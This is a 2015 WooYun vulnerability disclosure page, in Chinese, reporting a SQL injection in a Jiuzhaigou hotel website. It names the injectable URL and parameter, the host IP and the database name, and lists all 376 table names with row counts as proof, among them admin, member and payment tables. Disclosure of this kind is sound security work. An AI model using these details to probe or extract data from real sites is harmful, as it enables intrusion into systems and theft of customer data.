当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126764

漏洞标题:九寨沟星宇国际大酒店SQL注入

相关厂商:星宇国际大酒店

漏洞作者: 蝶.!

提交时间:2015-07-14 17:23

修复时间:2015-08-28 17:24

公开时间:2015-08-28 17:24

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:3

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

九寨沟星宇国际大酒店SQL注入

详细说明:

注入点: http://www.xingyuhotel.com/english/news.php?id=28&typeid=2
Host IP: 121.42.111.170
Web Server: Apache
Keyword Found: Release
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 2
Current DB: qdm16058959_db

漏洞证明:

Tables of qdm16058959_db:
table_name table_rows
------------------------------------------------------------
table count:376
access 0
adminlog 0
announcement 0
attachment 0
avatar 0
bbcode 9
biaotou 88
calendar_events 0
cdb_access 0
cdb_activities 0
cdb_activityapplies 0
cdb_adminactions 0
cdb_admingroups 3
cdb_adminnotes 0
cdb_adminsessions 0
cdb_advertisements 0
cdb_announcements 0
cdb_attachments 0
cdb_attachtypes 0
cdb_banned 0
cdb_bbcodes 7
cdb_blogcaches 0
cdb_buddys 0
cdb_creditslog 0
cdb_crons 11
cdb_failedlogins 2
cdb_favorites 0
cdb_forumfields 1
cdb_forumlinks 1
cdb_forums 1
cdb_medals 10
cdb_memberfields 1
cdb_members 1
cdb_moderators 0
cdb_modworks 0
cdb_myposts 0
cdb_mythreads 111
cdb_onlinelist 4
cdb_onlinetime 22
cdb_orders 0
cdb_paymentlog 0
cdb_pluginhooks 0
cdb_plugins 0
cdb_pluginvars 0
cdb_pms 0
cdb_pmsearchindex 0
cdb_polloptions 0
cdb_polls 0
cdb_posts 0
cdb_profilefields 0
cdb_promotions 0
cdb_pushedthreads 0
cdb_ranks 5
cdb_ratelog 0
cdb_regips 0
cdb_relatedthreads 0
cdb_rewardlog 0
cdb_rsscaches 20
cdb_searchindex 0
cdb_sessions 0
cdb_settings 187
cdb_smilies 29
cdb_stats 50
cdb_statvars 71
cdb_styles 1
cdb_stylevars 34
cdb_subscriptions 0
cdb_templates 1
cdb_threads 0
cdb_threadsmod 0
cdb_threadtypes 0
cdb_tradelog 0
cdb_trades 0
cdb_usergroups 15
cdb_validating 0
cdb_words 0
chanpin 0
customavatar 0
faddress 6
farea 6
fbrowser 7
fipone 9
fiptwo 30
fmozilla 28
forum 3
forumpermission 0
frefer 24
fscreen 8
fsystem 5
fvisit 1
fweburl 6
gs_ygb 7
ht_liuyan 2
ht_yuding 1
icon 14
infolist 1
ipinfo 0
ipscope 16
jituan_access 0
jituan_adminactions 0
jituan_admingroups 3
jituan_adminnotes 0
jituan_adminsessions 1
jituan_advertisements 0
jituan_announcements 0
jituan_attachments 0
jituan_attachtypes 0
jituan_banned 0
jituan_bbcodes 7
jituan_blogcaches 0
jituan_buddys 0
jituan_creditslog 0
jituan_crons 8
jituan_failedlogins 1
jituan_favorites 0
jituan_forumfields 1
jituan_forumlinks 1
jituan_forums 1
jituan_medals 10
jituan_memberfields 1
jituan_members 1
jituan_moderators 0
jituan_modworks 0
jituan_onlinelist 4
jituan_onlinetime 1
jituan_orders 0
jituan_paymentlog 0
jituan_pluginhooks 0
jituan_plugins 0
jituan_pluginvars 0
jituan_pms 0
jituan_pmsearchindex 0
jituan_polls 0
jituan_posts 0
jituan_profilefields 0
jituan_promotions 0
jituan_ranks 5
jituan_ratelog 0
jituan_regips 0
jituan_relatedthreads 0
jituan_rsscaches 0
jituan_searchindex 0
jituan_sessions 0
jituan_settings 159
jituan_smilies 27
jituan_stats 50
jituan_statvars 0
jituan_styles 1
jituan_stylevars 27
jituan_subscriptions 0
jituan_templates 1
jituan_threads 0
jituan_threadsmod 0
jituan_threadtypes 0
jituan_usergroups 15
jituan_validating 0
jituan_words 0
lanmu 55
lanmuname 19
moderator 0
net_search_fs 0
new_dk_jianjie 1
new_dk_jianjie_en 1
new_dk_leibie 1
new_dk_news 1
new_dk_news_en 1
new_dk_yeji 1
new_dk_yeji_en 1
new_dk_zhanshi 9
new_fazhan 1
new_hty_about 1
new_hty_changshi 28
new_hty_changshi_en 1
new_hty_jingdian 8
new_hty_notice 1
new_hty_shengnei 5
new_hty_shengwai 0
new_hty_xibu 0
new_hty_zt 0
new_hty_zt_leibie 0
new_hy_jianjie 2
new_hy_jianjie_en 1
new_hy_qita 4
new_hy_sc 20
new_hy_sc_jianjie 1
new_hy_sc_jianjie_en 1
new_jd_huodong 1
new_jd_news 2
new_jd_service 2
new_jd_service_en 2
new_jd_shebei 3
new_jd_shebei_en 3
new_jd_wenhua 3
new_jd_wenhua_en 3
new_jd_wenhuahj 1
new_jianjie 1
new_news 1
new_news_en 1
new_notice 1
new_notice_en 1
new_qy_wenhua 1
new_qy_zhongzhi 1
new_zonghe 6
new_zonghe_en 6
news 225
poll 0
pollvote 0
post 32
privatemessage 0
profilefield 4
replacement 45
replacementset 1
rh_auth 5
search 23
searchindex 3093
session 13
setting 169
settinggroup 31
smilie 11
statday 22
statmonth 14
statweek 2
statyear 9
style 1
subscribeforum 1
subscribethread 115
table_name 164
table_name_other 30
template 466
templateset 1
test 0
thread 30
threadrate 0
type 4
user 54
userfield 165
usergroup 7
users 1
usertitle 10
visitor 30
word 1923
xyhtl_bg_interface 292
xyhtl_bg_interface_other 39
xyhtl_bg_menu 49
xyhtl_bg_search_form 0
xyhtl_bg_user 3
xyhtl_bg_usergroup 2
xyhtl_catering_info 73
xyhtl_catering_overview 1
xyhtl_catering_type 5
xyhtl_conference_info 2
xyhtl_contact_info 1
xyhtl_en_catering_info 73
xyhtl_en_catering_overview 1
xyhtl_en_catering_type 5
xyhtl_en_conference_info 2
xyhtl_en_contact_info 1
xyhtl_en_entertainment_info 7
xyhtl_en_guestroom_info 4
xyhtl_en_guestroom_overview 1
xyhtl_en_hotel_info 5
xyhtl_en_message_info 13
xyhtl_en_news_info 36
xyhtl_en_news_type 3
xyhtl_en_qq_info 3
xyhtl_en_qq_type 3
xyhtl_en_recruitment_forjob 6
xyhtl_en_recruitment_forsave 4
xyhtl_en_recruitment_job 18
xyhtl_en_recruitment_policy 1
xyhtl_entertainment_info 7
xyhtl_guestroom_info 6
xyhtl_guestroom_overview 1
xyhtl_hotel_info 5
xyhtl_message_info 10
xyhtl_news_info 77
xyhtl_news_type 5
xyhtl_pay 45
xyhtl_pay_user 30
xyhtl_qq_info 2
xyhtl_qq_type 1
xyhtl_recruitment_forjob 40
xyhtl_recruitment_forsave 15
xyhtl_recruitment_job 18
xyhtl_recruitment_policy 1
xyhtl_room 294
xyjd_gs_ygb 5
xyjd_jdkj_dinggou 4
xyjd_jdkj_fjlx 8
xyjd_jdkj_jdjs 2
xyjd_jdkj_kfjs 2
xyjd_jdkj_link 6
xyjd_jdkj_liuyan 35
xyjd_jdkj_lxfs 2
xyjd_jdkj_ptss 5
xyjd_jituan_dczhuti 4
xyjd_jituan_diaocha 9
xyjd_jituan_download 2
xyjd_jituan_fzlc 2
xyjd_jituan_guanggao 4
xyjd_jituan_jtjs 2
xyjd_jituan_ldzc 2
xyjd_jituan_link 11
xyjd_jituan_liuyan 8
xyjd_jituan_lxwm 3
xyjd_jituan_news 10
xyjd_jituan_newslb 6
xyjd_jituan_qyry 2
xyjd_jituan_qywhjs 2
xyjd_jituan_qywhxx 4
xyjd_jituan_ypzw 14
xyjd_jituan_zwfb 3
xyjd_jituan_zzjg 2
xyjd_kangdi_cpleibie 2
xyjd_kangdi_dinggou 2
xyjd_kangdi_gsjs 2
xyjd_kangdi_gsqj 8
xyjd_kangdi_gsyj 2
xyjd_kangdi_link 2
xyjd_kangdi_liuyan 2841
xyjd_kangdi_lxwm 2
xyjd_kangdi_news 2
xyjd_kangdi_newslb 4
xyjd_kangdi_product 12
xyjd_kangdi_productlb 8
xyjd_kangdi_xsnet 2
xyjd_lanmu 232
xyjd_lvxingshe_news 2
xyjd_net_cdjs 2
xyjd_net_cpname 10
xyjd_net_cpxl 5
xyjd_net_cygs 2
xyjd_net_cyhj 2
xyjd_net_cyjs 2
xyjd_net_dlhj 2
xyjd_net_dtbz 0
xyjd_net_dtds 2
xyjd_net_fangjian 9
xyjd_net_fjgpjg 8
xyjd_net_fjjg 8
xyjd_net_fjjs 8
xyjd_net_fjptss 8
xyjd_net_fjznxt 8
xyjd_net_fwln 2
xyjd_net_fwxmjs 2
xyjd_net_fwxmtk 7
xyjd_net_gnjs 2
xyjd_net_jcgw 2
xyjd_net_jdbz 2
xyjd_net_jdgk 2
xyjd_net_jdpic 2
xyjd_net_jgrl 2
xyjd_net_jqwy 2
xyjd_net_jyzz 2
xyjd_net_khjj 2
xyjd_net_link 5
xyjd_net_lxwm 2
xyjd_net_news 32
xyjd_net_newslb 7
xyjd_net_pmt 2
xyjd_net_ptss 2
xyjd_net_search_fs 0
xyjd_net_tscy 3
xyjd_net_wsyd 0
xyjd_net_ypzw 27
xyjd_net_zcgs 1
xyjd_net_zgfljs 9
xyjd_net_zpjj 2
xyjd_net_zwfb 21
xyjd_net_zzjg 2
xyjd_pay 13
xyjd_pay_user 34
xyjd_rh_auth 5
xyjd_room 61
xyjd_table_name 503
xyjd_table_name_other 44

修复方案:

版权声明:转载请注明来源 蝶.!@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝